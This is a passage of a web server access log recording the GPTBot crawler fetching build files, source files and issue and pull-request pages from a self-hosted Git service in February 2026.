git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11035] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12443] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:17:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:17:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:17:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 21147] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:17:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 20648] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:17:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11370] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 19946] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:17:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13917] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:17:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11300] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:35:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" +[17/Feb/2026:17:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/main.py" +[17/Feb/2026:17:35:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" +[17/Feb/2026:17:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/main.py" +[17/Feb/2026:17:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 9804] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" +[17/Feb/2026:17:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 861] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" +[17/Feb/2026:17:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11302] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9933] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10112] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:17:35:13 